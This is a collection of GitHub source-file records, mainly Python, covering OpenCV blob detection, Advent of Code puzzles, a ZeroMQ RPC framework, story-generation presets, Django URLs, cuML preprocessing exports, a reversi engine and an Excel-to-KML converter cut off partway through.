block\r\n im_with_keypoints = cv2.drawKeypoints(image_raw, keypoints, np.array([]),(0,0,255))\r\n xw_yw = []\r\n if(num_blobs == 0):\r\n pass\r\n print(\"No block found!\")\r\n else:\r\n # Convert image coordinates to global world coordinate using IM2W() function\r\n for i in range(num_blobs):\r\n xw_yw.append(IMG2W(blob_image_center[i][0], blob_image_center[i][1]))\r\n #cv2.namedWindow(\"Camera View\")\r\n #cv2.imshow(\"Camera View\", image_raw)\r\n #cv2.namedWindow(\"Mask View\")\r\n #cv2.imshow(\"Mask View\", mask_image)\r\n cv2.namedWindow(\"Keypoint View\")\r\n cv2.imshow(\"Keypoint View\", im_with_keypoints)\r\n cv2.waitKey(2)\r\n return xw_yw\r\n","repo_name":"ZheyuZhou/ECE-470-Project","sub_path":"blob_search.py","file_name":"blob_search.py","file_ext":"py","file_size_in_byte":2767,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"292391041","text":"#!/usr/bin/env python3\nfrom typing import List, Any, Callable\n\n\nclass FindSeat:\n f = open(\"data.txt\", \"r\")\n lines = f.read().splitlines()\n row = 0\n column = 0\n id = 0\n ids = []\n seatsTaken = []\n\n rows = range(128)\n columns = range(8)\n\n def findOwnSeat(self):\n for seatID in self.ids:\n if (seatID + 1 in self.ids) and (seatID - 1 in self.ids):\n self.seatsTaken.append(seatID)\n\n self.seatsTaken.sort()\n diff: Callable[[Any, Any], List[Any]] = lambda l1, l2: [x for x in l1 if x not in l2]\n emptySeats = diff(self.ids, self.seatsTaken)\n emptySeats.sort()\n\n emptySeats.remove(emptySeats[0])\n emptySeats = emptySeats[:len(emptySeats) - 1]\n yourSeatRange = range(emptySeats[0], emptySeats[1])\n print(\"Your Seat ID: \", yourSeatRange[1])\n\n def boarding(self):\n for line in self.lines:\n self.id, self.row, self.column = 0, 0, 0\n self.rows = range(128)\n self.columns = range(8)\n\n r_locs = line[0:7]\n c_locs = line[7:10]\n\n for r_loc in r_locs:\n self.rows = getPosition(r_loc, self.rows)\n if len(self.rows) == 1:\n for row in self.rows:\n self.row = int(row)\n\n for c_loc in c_locs:\n self.columns = getPosition(c_loc, self.columns)\n if len(self.columns) == 1:\n for column in self.columns:\n self.column = int(column)\n\n self.id = self.row * 8 + self.column\n self.ids.append(self.id)\n self.findOwnSeat()\n\n\ndef getPosition(char, range):\n if char in [\"F\", \"L\"]: # lower\n return range[:len(range) // 2]\n if char in [\"B\", \"R\"]: # upper\n return range[len(range) // 2:]\n\n\nFindSeat().boarding()\n","repo_name":"mrmoonlv/Advent-of-Code","sub_path":"2020/day5/part2.py","file_name":"part2.py","file_ext":"py","file_size_in_byte":1871,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"9302301123","text":"import os\nfrom os import truncate\nimport signal\nimport threading\nimport traceback\nfrom datetime import datetime, timedelta\nfrom functools import lru_cache\nfrom typing import Any, Callable, Dict\nfrom pathlib import Path\n\nimport zmq\nimport zmq.auth\nfrom zmq.backend.cython.constants import NOBLOCK\nfrom zmq.auth.thread import ThreadAuthenticator\n\n\n# Achieve Ctrl-c interrupt recv\nsignal.signal(signal.SIGINT, signal.SIG_DFL)\n\n\nKEEP_ALIVE_TOPIC: str = \"_keep_alive\"\nKEEP_ALIVE_INTERVAL: timedelta = timedelta(seconds=1)\nKEEP_ALIVE_TOLERANCE: timedelta = timedelta(seconds=30)\n\n\nclass RemoteException(Exception):\n \"\"\"\n RPC remote exception\n \"\"\"\n\n def __init__(self, value: Any):\n \"\"\"\n Constructor\n \"\"\"\n self.__value = value\n\n def __str__(self):\n \"\"\"\n Output error message\n \"\"\"\n return self.__value\n\n\nclass RpcServer:\n \"\"\"\"\"\"\n\n def __init__(self):\n \"\"\"\n Constructor\n \"\"\"\n # Save functions dict: key is fuction name, value is fuction object\n self.__functions: Dict[str, Any] = {}\n\n # Zmq port related\n self.__context: zmq.Context = zmq.Context()\n\n # Reply socket (Request–reply pattern)\n self.__socket_rep: zmq.Socket = self.__context.socket(zmq.REP)\n\n # Publish socket (Publish–subscribe pattern)\n self.__socket_pub: zmq.Socket = self.__context.socket(zmq.PUB)\n\n # Worker thread related\n self.__active: bool = False # RpcServer status\n self.__thread: threading.Thread = None # RpcServer thread\n self.__lock: threading.Lock = threading.Lock()\n\n # Authenticator used to ensure data security\n self.__authenticator: ThreadAuthenticator = None\n\n def is_active(self) -> bool:\n \"\"\"\"\"\"\n return self.__active\n\n def start(\n self, \n rep_address: str, \n pub_address: str,\n server_secretkey_path: str = \"\",\n username: str = \"\",\n password: str = \"\"\n ) -> None:\n \"\"\"\n Start RpcServer\n \"\"\"\n if self.__active:\n return\n\n # Start authenticator\n if server_secretkey_path:\n self.__authenticator = ThreadAuthenticator(self.__context)\n self.__authenticator.start()\n self.__authenticator.configure_curve(\n domain=\"*\", \n location=zmq.auth.CURVE_ALLOW_ANY\n )\n\n publickey, secretkey = zmq.auth.load_certificate(server_secretkey_path)\n \n self.__socket_pub.curve_secretkey = secretkey\n self.__socket_pub.curve_publickey = publickey\n self.__socket_pub.curve_server = True\n\n self.__socket_rep.curve_secretkey = secretkey\n self.__socket_rep.curve_publickey = publickey\n self.__socket_rep.curve_server = True\n elif username and password:\n self.__authenticator = ThreadAuthenticator(self.__context)\n self.__authenticator.start()\n self.__authenticator.configure_plain(\n domain=\"*\", \n passwords={username: password}\n )\n\n self.__socket_pub.plain_server = True\n self.__socket_rep.plain_server = True\n\n # Bind socket address\n self.__socket_rep.bind(rep_address)\n self.__socket_pub.bind(pub_address)\n\n # Start RpcServer status\n self.__active = True\n\n # Start RpcServer thread\n self.__thread = threading.Thread(target=self.run)\n self.__thread.start()\n\n def stop(self) -> None:\n \"\"\"\n Stop RpcServer\n \"\"\"\n if not self.__active:\n return\n\n # Stop RpcServer status\n self.__active = False\n\n def join(self) -> None:\n # Wait for RpcServer thread to exit\n if self.__thread and self.__thread.is_alive():\n self.__thread.join()\n self.__thread = None\n\n def run(self) -> None:\n \"\"\"\n Run RpcServer functions\n \"\"\"\n start = datetime.utcnow()\n\n while self.__active:\n # Use poll to wait event arrival, waiting time is 1 second (1000 milliseconds)\n cur = datetime.utcnow()\n delta = cur - start\n\n if delta >= KEEP_ALIVE_INTERVAL:\n self.publish(KEEP_ALIVE_TOPIC, cur)\n\n if not self.__socket_rep.poll(1000):\n continue\n\n # Receive request data from Reply socket\n req = self.__socket_rep.recv_pyobj()\n\n # Get function name and parameters\n name, args, kwargs = req\n\n # Try to get and execute callable function object; capture exception information if it fails\n try:\n func = self.__functions[name]\n r = func(*args, **kwargs)\n rep = [True, r]\n except Exception as e: # noqa\n rep = [False, traceback.format_exc()]\n\n # send callable response by Reply socket\n self.__socket_rep.send_pyobj(rep)\n\n # Unbind socket address\n self.__socket_pub.unbind(self.__socket_pub.LAST_ENDPOINT)\n self.__socket_rep.unbind(self.__socket_rep.LAST_ENDPOINT)\n\n def publish(self, topic: str, data: Any) -> None:\n \"\"\"\n Publish data\n \"\"\"\n with self.__lock:\n self.__socket_pub.send_pyobj([topic, data])\n\n def register(self, func: Callable) -> None:\n \"\"\"\n Register function\n \"\"\"\n self.__functions[func.__name__] = func\n\n\nclass RpcClient:\n \"\"\"\"\"\"\n\n def __init__(self):\n \"\"\"Constructor\"\"\"\n # zmq port related\n self.__context: zmq.Context = zmq.Context()\n\n # Request socket (Request–reply pattern)\n self.__socket_req: zmq.Socket = self.__context.socket(zmq.REQ)\n\n # Subscribe socket (Publish–subscribe pattern)\n self.__socket_sub: zmq.Socket = self.__context.socket(zmq.SUB)\n\n # Worker thread relate, used to process data pushed from server\n self.__active: bool = False # RpcClient status\n self.__thread: threading.Thread = None # RpcClient thread\n self.__lock: threading.Lock = threading.Lock()\n\n # Authenticator used to ensure data security\n self.__authenticator: ThreadAuthenticator = None\n\n self._last_received_ping: datetime = datetime.utcnow()\n\n @lru_cache(100)\n def __getattr__(self, name: str):\n \"\"\"\n Realize remote call function\n \"\"\"\n\n # Perform remote call task\n def dorpc(*args, **kwargs):\n # Get timeout value from kwargs, default value is 30 seconds\n if \"timeout\" in kwargs:\n timeout = kwargs.pop(\"timeout\")\n else:\n timeout = 30000\n\n # Generate request\n req = [name, args, kwargs]\n\n # Send request and wait for response\n with self.__lock:\n self.__socket_req.send_pyobj(req)\n \n # Timeout reached without any data\n n = self.__socket_req.poll(timeout)\n if not n:\n msg = f\"Timeout of {timeout}ms reached for {req}\"\n raise RemoteException(msg)\n \n rep = self.__socket_req.recv_pyobj()\n\n # Return response if successed; Trigger exception if failed\n if rep[0]:\n return rep[1]\n else:\n raise RemoteException(rep[1])\n\n return dorpc\n\n def start(\n self, \n req_address: str, \n sub_address: str,\n client_secretkey_path: str = \"\",\n server_publickey_path: str = \"\",\n username: str = \"\",\n password: str = \"\"\n ) -> None:\n \"\"\"\n Start RpcClient\n \"\"\"\n if self.__active:\n return\n\n # Start authenticator\n if client_secretkey_path and server_publickey_path:\n self.__authenticator = ThreadAuthenticator(self.__context)\n self.__authenticator.start()\n self.__authenticator.configure_curve(\n domain=\"*\", \n location=zmq.auth.CURVE_ALLOW_ANY\n )\n\n publickey, secretkey = zmq.auth.load_certificate(client_secretkey_path)\n serverkey, _ = zmq.auth.load_certificate(server_publickey_path)\n \n self.__socket_sub.curve_secretkey = secretkey\n self.__socket_sub.curve_publickey = publickey\n self.__socket_sub.curve_serverkey = serverkey\n\n self.__socket_req.curve_secretkey = secretkey\n self.__socket_req.curve_publickey = publickey\n self.__socket_req.curve_serverkey = serverkey\n elif username and password:\n self.__authenticator = ThreadAuthenticator(self.__context)\n self.__authenticator.start()\n self.__authenticator.configure_plain(\n domain=\"*\", \n passwords={username: password}\n )\n\n self.__socket_sub.plain_username = username.encode()\n self.__socket_sub.plain_password = password.encode()\n \n self.__socket_req.plain_username = username.encode()\n self.__socket_req.plain_password = password.encode()\n \n # Connect zmq port\n self.__socket_req.connect(req_address)\n self.__socket_sub.connect(sub_address)\n\n # Start RpcClient status\n self.__active = True\n\n # Start RpcClient thread\n self.__thread = threading.Thread(target=self.run)\n self.__thread.start()\n\n self._last_received_ping = datetime.utcnow()\n\n def stop(self) -> None:\n \"\"\"\n Stop RpcClient\n \"\"\"\n if not self.__active:\n return\n\n # Stop RpcClient status\n self.__active = False\n\n def join(self) -> None:\n # Wait for RpcClient thread to exit\n if self.__thread and self.__thread.is_alive():\n self.__thread.join()\n self.__thread = None\n\n def run(self) -> None:\n \"\"\"\n Run RpcClient function\n \"\"\"\n pull_tolerance = int(KEEP_ALIVE_TOLERANCE.total_seconds() * 1000)\n\n while self.__active:\n if not self.__socket_sub.poll(pull_tolerance):\n self.on_disconnected()\n continue\n\n # Receive data from subscribe socket\n topic, data = self.__socket_sub.recv_pyobj(flags=NOBLOCK)\n\n if topic == KEEP_ALIVE_TOPIC:\n self._last_received_ping = data\n else:\n # Process data by callable function\n self.callback(topic, data)\n\n # Close socket\n self.__socket_req.close()\n self.__socket_sub.close()\n\n def callback(self, topic: str, data: Any) -> None:\n \"\"\"\n Callable function\n \"\"\"\n raise NotImplementedError\n\n def subscribe_topic(self, topic: str) -> None:\n \"\"\"\n Subscribe data\n \"\"\"\n self.__socket_sub.setsockopt_string(zmq.SUBSCRIBE, topic)\n\n def on_disconnected(self):\n \"\"\"\n Callback when heartbeat is lost.\n \"\"\"\n print(\"RpcServer has no response over {tolerance} seconds, please check you connection.\"\n .format(tolerance=KEEP_ALIVE_TOLERANCE.total_seconds()))\n\n\ndef generate_certificates(name: str) -> None:\n \"\"\"\n Generate CURVE certificate files for zmq authenticator.\n \"\"\"\n keys_path = Path.cwd().joinpath(\"certificates\")\n if not keys_path.exists():\n os.mkdir(keys_path)\n\n zmq.auth.create_certificates(keys_path, name)","repo_name":"xiqicpt/master-vnpy","sub_path":"vnpy/rpc/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":11648,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"57"} +{"seq_id":"38974254718","text":"line = input()\nbridge = [input(), input()]\nlength = len(bridge[0])\ndp = [[0] * length + [1] for _ in range(2)]\nconverter = {'R': 0, 'I': 1, 'N': 2, 'G': 3, 'S': 4}\nRINGS_idxes = [[[] for __ in range(2)] for _ in range(5)] + [[[-1], [-1]]] # [r, i, n, g, s]\nfor i in range(2):\n for j in range(length):\n c_idx = converter[bridge[i][j]]\n RINGS_idxes[c_idx][i].append(j)\n # elif bridge[i][j] == 'I':\n # RINGS_idxes[1][i].append(j)\n # elif bridge[i][j] == 'N':\n # RINGS_idxes[2][i].append(j)\n # elif bridge[i][j] == 'G':\n # RINGS_idxes[3][i].append(j)\n # elif bridge[i][j] == 'S':\n # RINGS_idxes[4][i].append(j)\n\nlast_c_idx = 5\nfor l in line:\n temp_nxt = []\n for i in range(2):\n last_length = len(RINGS_idxes[last_c_idx][not i])\n c_idx = converter[l]\n for c in RINGS_idxes[c_idx][i]:\n least_idx = 0\n nxt = 0\n while least_idx < last_length:\n least_c = RINGS_idxes[last_c_idx][not i][least_idx]\n if least_c < c:\n nxt += dp[not i][least_c]\n least_idx += 1\n else:\n break\n\n temp_nxt.append(nxt)\n\n for i in range(2):\n for c in RINGS_idxes[c_idx][i]:\n dp[i][c] = temp_nxt.pop(0)\n last_c_idx = c_idx\n\ntotal = 0\nfor i in range(2):\n for c in RINGS_idxes[c_idx][i]:\n total += dp[i][c]\n\nprint(total)\n","repo_name":"leeholeo/Algorithm_study","sub_path":"high_study/week_12/2602_cross_a_stone_bridge.py","file_name":"2602_cross_a_stone_bridge.py","file_ext":"py","file_size_in_byte":1482,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"25755973950","text":"\"\"\"\nStoryPresets.py\n\nA reference implementation of preset objects (communications, creative context, etc.) for story domain.\n\nTODO: consider migrating this as a common component of the main Creative Wand framework.\n\n\"\"\"\nfrom os import path\n\nfrom StorytellingDomain.Application.Instances.Communications.Echo import EchoComm\nfrom StorytellingDomain.Application.Instances.Communications.FeedbackComm import FeedbackComm\nfrom StorytellingDomain.Application.Instances.Communications.OpeningMessage import OpeningMessageComm\nfrom StorytellingDomain.Application.Instances.Communications.StoryContext.CARP.CARPFindLineByCriticComm import \\\n CARPFindLineByCriticComm, CARPOutOfTopicDetectionComm, CARPFindLineByDefaultCriticComm, CARPOOTDOnLastSentence, \\\n CARPFindByDefaultCriticComm\nfrom StorytellingDomain.Application.Instances.Communications.StoryContext.InspirationComm import InspirationComm\nfrom StorytellingDomain.Application.Instances.Communications.StoryContext.RequestGeneration import GenerateComm, \\\n GenerateWithFreezeComm, GenerateCommV2\nfrom StorytellingDomain.Application.Instances.Communications.StoryContext.ResetAreaComm import ResetAreaComm\nfrom StorytellingDomain.Application.Instances.Communications.StoryContext.ShowGenerated import ShowGeneratedComm\nfrom StorytellingDomain.Application.Instances.Communications.StoryContext.SuggestSentenceComm import SuggestSentenceComm\nfrom StorytellingDomain.Application.Instances.Communications.StoryContext.TopicRegenerationComm import \\\n TopicRegenerationComm\nfrom StorytellingDomain.Application.Instances.Communications.StoryContext.UserProvideSketch import UserSketchComm\nfrom StorytellingDomain.Application.Instances.Communications.StoryContext.UserWorkComm import UserWorkComm\nfrom StorytellingDomain.Application.Instances.Communications.UndoCommunication import UndoComm\nfrom StorytellingDomain.Application.Instances.CreativeContext.StoryCreativeContext import StoryCreativeContext\nfrom StorytellingDomain.Application.Instances.ExperienceManager.SimpleExperienceManager import SimpleExperienceManager\nfrom StorytellingDomain.Application.Instances.Frontend.WebFrontend import WebFrontend\nfrom CreativeWand.Utils.Misc.FileUtils import relative_path\n\n\n# If you need to add new entries (new communications, differet types of frontend, experience managers, etc.)\n# Add an entry in the import above, then add it to either `class_name_to_type` or `comm_list_objects`.\n\n# Here, we define a string to class type translation dict to help us define a Creative Wand setup by these names.\n# As they share common interfaces, this allows plug-and-play ness of setting up Creative Wand using modules.\n\nclass_name_to_type = {\n \"ExperienceManager\": SimpleExperienceManager,\n \"Frontend\": WebFrontend,\n \"CreativeContext\": StoryCreativeContext,\n}\n\n\"\"\"\nSpecifically for communications, we use this dictionary.\nvalid value formats in this dictionarys are as follows:\n\n- type\nIf a single type is provided, a communication object will be created with no parameters.\n\n- [type, dict]\nIf a list is provided, the first item will be interpreted as the `type` of the communication.\nThe second item, a `dict`, will be parsed as `**kwargs` to the communication.\n\"\"\"\n\n\ncomm_list_objects = {\"OpeningMessageComm\": OpeningMessageComm, \"EchoComm\": EchoComm,\n \"FeedbackComm\": [FeedbackComm, dict(description=\"Report goal completion.\",\n question_to_ask=\"Which subgoal did we achieve?\",\n options=[\n \"Start by talking about Business\",\n \"Ending in talking about Sports\",\n \"Mentioning Soccer\",\n ]\n )],\n \"UserSketchComm\": UserSketchComm,\n \"ShowGeneratedComm\": ShowGeneratedComm, \"GenerateWithSketchComm\": ShowGeneratedComm,\n \"GenerateComm\": GenerateComm, \"GenerateWithFreezeComm\": GenerateWithFreezeComm,\n \"GenerateComm_nosketch\": [GenerateComm, dict(allow_no_sketch=True)],\n \"GenerateWithFreezeComm_nosketch\": [GenerateWithFreezeComm, dict(allow_no_sketch=True)],\n \"GenerateCommV2\": GenerateCommV2,\n \"UserWorkComm\": UserWorkComm, \"InspirationComm\": InspirationComm,\n \"TopicRegenerationComm\": TopicRegenerationComm, \"SuggestSentenceComm\": SuggestSentenceComm,\n \"ResetAreaComm\": ResetAreaComm,\n \"FeedbackSubgoalAchieved\": [FeedbackComm, dict(\n description=\"Report to us on achieving subgoals.\",\n question_to_ask=\"Which subgoal did we achieve? (1 to 3, or None)?\"\n )],\n \"CARPFindLineByCriticComm\": CARPFindLineByCriticComm,\n \"CARPFindLineByDefaultCriticComm\": CARPFindLineByDefaultCriticComm,\n \"CARPFindByDefaultCriticComm\": CARPFindByDefaultCriticComm,\n \"CARPTopicComm\": CARPOutOfTopicDetectionComm,\n # \"CARPOOTDOnLastSentenceComm\":CARPOOTDOnLastSentence,\n \"UndoComm\": UndoComm,\n }\n\n\"\"\"\nThis defines groups of communications to be used in a Creative Wand setup.\n\"\"\"\ncomm_list_presets = {\n # \"s1_local_only\": [\n # \"OpeningMessageComm\",\n # \"FeedbackComm\",\n # \"ResetAreaComm\",\n # \"FeedbackSubgoalAchieved\",\n # \"GenerateComm_nosketch\",\n # \"GenerateWithFreezeComm_nosketch\",\n # \"UserWorkComm\",\n # \"CARPFindLineByCriticComm\",\n # ], \"s1_global_only\": [\n # \"OpeningMessageComm\",\n # \"FeedbackComm\",\n # \"ResetAreaComm\",\n # \"FeedbackSubgoalAchieved\",\n # \"UserSketchComm\",\n # \"GenerateWithSketchComm\",\n # ],\n \"s2_test\": [\n \"UndoComm\",\n \"UserSketchComm\",\n \"TopicRegenerationComm\",\n \"SuggestSentenceComm\",\n \"UserWorkComm\",\n \"GenerateCommV2\",\n \"CARPFindLineByCriticComm\",\n \"CARPFindLineByDefaultCriticComm\",\n \"CARPFindByDefaultCriticComm\",\n \"CARPTopicComm\",\n \"FeedbackComm\",\n ], \"test\": list(comm_list_objects.keys())}\n\n\"\"\"\nEach session will be initiated with a mode described below.\n\nPlease also see how these information is used by the session creator in:\nStorytellingDomain.Application.Instances.Frontend.WebFrontendHelper.WebFrontendServer.WebFrontendServer.home\n\n`filtering_tags` is a special key that is used to simplify ablation building.\nA communication has to \n- has a `list`-type `tag` attribute\n- at least has one item in its `tag` that also exists in `filtering_args`\nOr it will be removed from the communication list and not exist in the final session.\n\nFor example, if a Communication has tag `[1,2]` and\n- `filtering_tags = [3,4]` : This will not be included;\n- `filtering_tags = [2,3]` : This WILL be included.\n\n\n\"\"\"\nstory_mode_table = {\n \"test\": {\"experience_manager_class_name\": \"ExperienceManager\", \"domain\": \"story\",\n \"presets\": \"s2_test\", \"em_args\": {\"use_carp_for_options\": True, \"enable_interrupt\": False}},\n # \"local\": {\"experience_manager_class_name\": \"ExperienceManager\", \"domain\": \"story\",\n # \"presets\": \"s1_local_only\", \"goal\": \"story_goal_stub\"},\n # \"global\": {\"experience_manager_class_name\": \"ExperienceManager\", \"domain\": \"story\",\n # \"presets\": \"s1_global_only\", \"goal\": \"story_goal_stub\"},\n \"s2_f\": {\"experience_manager_class_name\": \"ExperienceManager\", \"domain\": \"story\",\n \"presets\": \"s2_test\", \"em_args\": {\"use_carp_for_options\": True, \"enable_interrupt\": False}},\n # \"rl\": {\"experience_manager_class_name\": \"RLEM\", \"domain\": \"story\", \"presets\": \"s1_local_only\",\n # \"goal\": \"story_goal_stub\"},\n \"s2_h\": {\"experience_manager_class_name\": \"ExperienceManager\", \"domain\": \"story\",\n \"presets\": \"s2_test\", \"em_args\": {\"use_carp_for_options\": True, \"enable_interrupt\": False},\n \"filtering_tags\": [\"general\", \"human\"]},\n \"s2_a\": {\"experience_manager_class_name\": \"ExperienceManager\", \"domain\": \"story\",\n \"presets\": \"s2_test\", \"em_args\": {\"use_carp_for_options\": True, \"enable_interrupt\": False},\n \"filtering_tags\": [\"general\", \"agent\"]},\n \"s2_g\": {\"experience_manager_class_name\": \"ExperienceManager\", \"domain\": \"story\",\n \"presets\": \"s2_test\", \"em_args\": {\"use_carp_for_options\": True, \"enable_interrupt\": False},\n \"filtering_tags\": [\"general\", \"global\"]},\n \"s2_l\": {\"experience_manager_class_name\": \"ExperienceManager\", \"domain\": \"story\",\n \"presets\": \"s2_test\", \"em_args\": {\"use_carp_for_options\": True, \"enable_interrupt\": False},\n \"filtering_tags\": [\"general\", \"local\"]},\n \"s2_e\": {\"experience_manager_class_name\": \"ExperienceManager\", \"domain\": \"story\",\n \"presets\": \"s2_test\", \"em_args\": {\"use_carp_for_options\": True, \"enable_interrupt\": False},\n \"filtering_tags\": [\"general\", \"elaboration\"]},\n \"s2_r\": {\"experience_manager_class_name\": \"ExperienceManager\", \"domain\": \"story\",\n \"presets\": \"s2_test\", \"em_args\": {\"use_carp_for_options\": True, \"enable_interrupt\": False},\n \"filtering_tags\": [\"general\", \"reflection\"]},\n}\n\n\ndef generate_goal_message(mode_description):\n \"\"\"\n Generate default goal message.\n \"\"\"\n basepath = path.dirname(__file__)\n filepath = path.abspath(path.join(basepath, \"StoryGoalMessage.md\"))\n goal_str = open(filepath, \"r\").read()\n message = goal_str.format(\n goal_info=\"Create a story that \\n* Start by talking about Business; \\n* Ending in talking about Sports; and\\n * Mentions soccer.\"\n )\n return message\n\n\nfor key in story_mode_table:\n if \"goal\" not in story_mode_table[key]:\n story_mode_table[key][\"goal\"] = generate_goal_message(story_mode_table[key])\n\n\ndef create_comms_from_preset(name: str) -> list:\n \"\"\"\n Instantiate all communications based on the name for the preset.\n :param name: preset name.\n :return: all instantiated communications (Still needs bi\n \"\"\"\n result = []\n try:\n comm_list = get_preset(name)\n except KeyError:\n raise KeyError(\"Unknown preset for exp_setup: %s\" % name)\n if comm_list is not None:\n for item in comm_list:\n result.append(o(item))\n return result\n # sem.register_communication(o(item))\n # print(\"Registered: Frontend # %s\" % sem.frontend.id)\n\n\ndef get_preset(name: str) -> list:\n \"\"\"\n Get a preset communication list from the preset dictionary.\n :param name: key for the comm list.\n :return: the comm list.\n \"\"\"\n return comm_list_presets[name]\n\n\ndef o(name: str) -> object:\n \"\"\"\n Get an object from comm_list_objects.\n :param name: key\n :return: value\n \"\"\"\n entry = comm_list_objects[name]\n if type(entry) is list:\n result = entry[0](**entry[1])\n else:\n result = entry()\n print(\"Created object: %s\" % result)\n return result\n\n# if __name__ == '__main__':\n# # Generate yml equivalent of presets.\n# import yaml\n# with open('story_runs.yaml','w') as file:\n# yaml.dump(story_mode_table,file)\n# with open('story_modes.yaml','w') as file:\n# yaml.dump(comm_list_presets,file)\n","repo_name":"eilab-gt/beyond-prompts-experiment","sub_path":"StorytellingDomain/Application/Deployment/Presets/StoryPresets.py","file_name":"StoryPresets.py","file_ext":"py","file_size_in_byte":11546,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"57"} +{"seq_id":"29509083528","text":"from django.conf.urls import url, include\nfrom . import views\n\nurlpatterns = [\n url(r'^$', views.equipo_listar, name ='equipo_listar'),\n url(r'^equipo/nuevo/$', views.equipo_nuevo, name='equipo_nuevo'),\n url(r'^equipo/(?P[0-9]+)/$', views.equipo_detalle, name='equipo_detalle'),\n url(r'^equipo/(?P[0-9]+)/editar/$', views.equipo_editar, name='equipo_editar'),\n url(r'^equipo/(?P\\d+)/remover/$', views.equipo_remover, name='equipo_remover'),\n url(r'^jugador/nuevo/$', views.jugador_nuevo, name= 'jugador_nuevo'),\n url(r'^jugador/lista/$', views.jugador_listar, name = 'jugador_listar'),\n url(r'^jugador/(?P[0-9]+)/$', views.jugador_detalle, name='jugador_detalle'),\n url(r'^jugador/(?P[0-9]+)/editar/$', views.jugador_editar, name='jugador_editar'),\n url(r'^jugador/(?P\\d+)/remover/$', views.jugador_remover, name='jugador_remover'),\n ]\n","repo_name":"Josephe23/torneo","sub_path":"equipos/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":893,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"18652230149","text":"from cuml.model_selection import train_test_split\nfrom cuml.preprocessing.LabelEncoder import LabelEncoder\nfrom cuml.preprocessing.label import LabelBinarizer, label_binarize\nfrom cuml.preprocessing.encoders import OneHotEncoder\nfrom cuml.preprocessing.TargetEncoder import TargetEncoder\nfrom cuml.preprocessing import text\n\nfrom cuml._thirdparty.sklearn.preprocessing import (\n Binarizer,\n FunctionTransformer,\n KBinsDiscretizer,\n KernelCenterer,\n MaxAbsScaler,\n MinMaxScaler,\n MissingIndicator,\n Normalizer,\n PolynomialFeatures,\n PowerTransformer,\n QuantileTransformer,\n RobustScaler,\n SimpleImputer,\n StandardScaler,\n)\n\nfrom cuml._thirdparty.sklearn.preprocessing import (\n add_dummy_feature,\n binarize,\n maxabs_scale,\n minmax_scale,\n normalize,\n power_transform,\n quantile_transform,\n robust_scale,\n scale,\n)\n\n\n__all__ = [\n # Classes\n \"Binarizer\",\n \"FunctionTransformer\",\n \"KBinsDiscretizer\",\n \"KernelCenterer\",\n \"LabelBinarizer\",\n \"LabelEncoder\",\n \"MaxAbsScaler\",\n \"MinMaxScaler\",\n \"MissingIndicator\",\n \"Normalizer\",\n \"OneHotEncoder\",\n \"PolynomialFeatures\",\n \"PowerTransformer\",\n \"QuantileTransformer\",\n \"RobustScaler\",\n \"SimpleImputer\",\n \"StandardScaler\",\n \"TargetEncoder\",\n # Functions\n \"add_dummy_feature\",\n \"binarize\",\n \"label_binarize\",\n \"maxabs_scale\",\n \"minmax_scale\",\n \"normalize\",\n \"power_transform\",\n \"quantile_transform\",\n \"robust_scale\",\n \"scale\",\n \"train_test_split\",\n # Modules\n \"text\",\n]\n","repo_name":"rapidsai/cuml","sub_path":"python/cuml/preprocessing/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1576,"program_lang":"python","lang":"en","doc_type":"code","stars":3661,"dataset":"github-code","pt":"57"} +{"seq_id":"33441150679","text":"import random\nimport time\nfrom typing import Literal\nfrom board import Board\n\nfrom engines.engine import IEngine\n\n\nclass RandomEngine(IEngine):\n \"\"\"\n Engine always choosing random moves from all possible\n\n \"\"\"\n\n def __init__(\n self,\n color: Literal[\"@\", \"O\"],\n current_board: Board,\n timer: bool = False,\n ) -> None:\n self.color = color\n self.board = current_board\n self.timer = timer\n print(f\"Random engine discs: {self.color}\\n\")\n\n def perform_move(self):\n possible_moves = self.board.find_possible_moves_for_player(self.color)\n start = time.time()\n move = random.choice(possible_moves)\n end = time.time()\n\n if self.timer:\n print(\n f\"Random engine move: (new disc position, discs to flip) = {move}, time: {end - start}\"\n )\n\n return move\n","repo_name":"batmatt/wsi-course-labs","sub_path":"deterministic_games_reversi/engines/random.py","file_name":"random.py","file_ext":"py","file_size_in_byte":892,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"57"} +{"seq_id":"779326706","text":"import openpyxl\r\nimport simplekml\r\nimport os\r\n\r\n\r\ndef exceltodict(filename, sheetname):\r\n \"\"\"\r\n filename is a string\r\n sheet is a string\r\n returns geodict:\r\n names as keys strings\r\n coordinates as values strings\r\n \"\"\"\r\n\r\n book = openpyxl.load_workbook(filename)\r\n sheet = book.get_sheet_by_name(sheetname)\r\n\r\n colm = {}\r\n\r\n j = 1\r\n while (sheet.cell(row=1, column=j).value) is not None:\r\n if str(sheet.cell(row=1, column=j).value) in [\"Name\", \"Nombre\", \"NAME\", \"NOMBRE\", \"IE\"]:\r\n colm[\"NAMES\"] = j\r\n elif str(sheet.cell(row=1, column=j).value) in [\"LAT\", \"Lat\"]:\r\n colm[\"LATS\"] = j\r\n elif str(sheet.cell(row=1, column=j).value) in [\"LONG\", \"Long\"]:\r\n colm[\"LONGS\"] = j\r\n elif \"NAMES\" in colm and \"LATS\" in colm and \"LONGS\" in colm: # If all columns are in colm then stop\r\n break\r\n j += 1\r\n\r\n geodict = {}\r\n\r\n i = 2\r\n while (sheet.cell(row=i, column=1).value) is not None:\r\n name = str(sheet.cell(row=i, column=colm[\"NAMES\"]).value)\r\n lat = str(sheet.cell(row=i, column=colm[\"LATS\"]).value)\r\n long = str(sheet.cell(row=i, column=colm[\"LONGS\"]).value)\r\n geodict[name] = long + \",\" + lat\r\n i += 1\r\n\r\n return geodict\r\n\r\n\r\ndef dicttoKMLfolder(datadict):\r\n \"\"\"\r\n datadict is a dictionary with:\r\n names as keys, strings\r\n lat and log as values, strings\r\n returns KMLfolder with points\r\n \"\"\"\r\n\r\n\r\ndef KMLfldtofile(KMLfolder, 